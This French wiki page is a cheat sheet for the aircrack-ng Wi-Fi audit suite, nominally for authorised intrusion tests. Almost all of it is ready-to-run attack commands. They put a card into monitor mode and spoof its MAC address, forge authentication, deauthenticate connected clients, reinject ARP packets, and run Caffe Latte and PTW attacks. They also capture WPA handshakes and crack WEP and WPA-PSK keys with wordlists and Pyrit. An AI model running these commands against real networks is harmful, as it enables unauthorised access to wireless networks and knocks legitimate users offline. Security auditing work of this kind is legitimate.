Aircrack

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Audit Wi-Fi, cassage WEP / WPA-PSK
Suite aircrack-ng (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng)
Contexte Test d'intrusion sans-fil sur un reseau autorise
Voir aussi Wifite · Reaver · Cowpatty · Wpa supplicant

La suite aircrack-ng regroupe les outils de reference pour l'audit des reseaux Wi-Fi : capture du trafic, injection de paquets et cassage des cles WEP et WPA/WPA2-PSK. L'interface graphique Wifite s'appuie sur cette suite.

Preparation de l'interface

Passer la carte en mode moniteur :

iwconfig wlan0 down
iwconfig wlan0 mode monitor
iwconfig wlan0 up
apt-get install aircrack-ng

Lister les interfaces Wi-Fi du poste :

iwconfig

Ordre de grandeur du nombre de paquets (IV) a collecter pour casser une cle WEP :

  • environ 400 000 paquets pour une cle WEP 64 bits ;
  • environ 1 200 000 paquets pour une cle WEP 128 bits.

La compatibilite des cartes en mode moniteur est documentee sur aircrack-ng.org.

Procedure WEP

Activer le mode moniteur :

airmon-ng start wlan0 [channel]

Lister les reseaux visibles :

airodump-ng mon0

Capturer les paquets d'un canal donne :

airodump-ng -c [channel] --bssid [mac_ap] -w [fichier] mon0

Creer une fausse authentification :

# WEP
aireplay-ng -1 0 -a [mac_ap] mon0
# WPA2 (mac_local visible dans ifconfig)
aireplay-ng -0 0 -a [mac_ap] -c [mac_local] mon0

Injecter des paquets (ici mode 3, reinjection ARP) :

# WEP
aireplay-ng -3 -b [mac_ap] mon0
# WPA2
aireplay-ng -0 0 -a [mac_ap] mon0

Casser le fichier de capture :

aircrack-ng [fichier.cap]
aircrack-ng [fichier.cap] -w /usr/share/wordlists/darkc0de.lst

Une fois la cle retrouvee, etablir la connexion (par exemple via Wicd).

Modes de aireplay-ng

man aireplay-ng
  • -0 : desauthentification, deconnecte les clients
  • -1 : fausse authentification
  • -2 : reinjection de paquet (mode interactif)
  • -3 : injection de requete ARP
  • -4 : attaque chopchop
  • -5 : attaque par fragmentation
  • -6 : Caffe Latte
  • -7 : cfrag par fragmentation
  • -8 : migmode (contre Aironet Cisco)
  • -9 : test de la qualite d'injection
  • -Z : attaque PTW

Exemple de mode interactif (-2) :

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b AA:BB:CC:DD:EE:FF mon0

Fausse authentification puis reinjection ARP (-3) :

aireplay-ng -1 0 -e [essid] -a [mac_ap] -h 00:00:00:00:00:01 wlan0
aireplay-ng -3 -e [essid] -b [mac_ap] -h 00:00:00:00:00:01 wlan0
aireplay-ng -3 -b [mac_ap] wlan0

Attaque Caffe Latte (-6) :

aireplay-ng --caffe-latte -b [mac_ap] mon0

L'attaque PTW reduit fortement le nombre de paquets necessaires pour retrouver la cle.

Se connecter au reseau

# authentification WEP
iwconfig wlan0 essid "mon_essid" channel 6 key password
dhclient wlan0
netdiscover

Pour une authentification WPA, voir Wpa supplicant.

Cassage WPA

Le cassage WPA est plus complexe : il repose sur la capture d'un handshake puis une attaque par dictionnaire.

airodump-ng -w capture --bssid [mac_ap] -c [channel] mon0
aireplay-ng --deauth 1 -a [mac_ap] -c [mac_station] mon0

Procedure complete :

airmon-ng start wlan0 [channel]
airmon-ng
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
airodump-ng -c 1 -w [fichier] --bssid [bssid] --ivs mon0

Attendre l'apparition d'une station (client authentifie), puis forcer une desauthentification :

aireplay-ng -0 1 -e [essid] mon0

Le handshake WPA doit apparaitre dans l'en-tete de airodump-ng. Casser ensuite par dictionnaire :

aircrack-ng -w /usr/share/wordlists/darkc0de.lst fichier-01.ivs

Pyrit

Pyrit accelere le cassage WPA-PSK et peut etre utilise en cluster :

svn checkout http://pyrit.googlecode.com/svn/trunk pyrit
sudo apt-get install libssl-dev python python-dev
sudo python setup.py install

Importer les cles candidates et les ESSID, puis lancer le calcul :

pyrit -i dict.gz import_passwords
pyrit -e linksys create_essid
pyrit batch

Capturer puis attaquer :

airodump-ng --write wpapskcapture.cap wlan0
pyrit -r wpapskcapture.cap attack_db

Voir aussi

  • Wifite — automatisation de la suite aircrack-ng
  • Reaver — attaque WPS
  • Cowpatty — cassage WPA par dictionnaire / rainbow tables
  • Wpa supplicant — connexion WPA en ligne de commande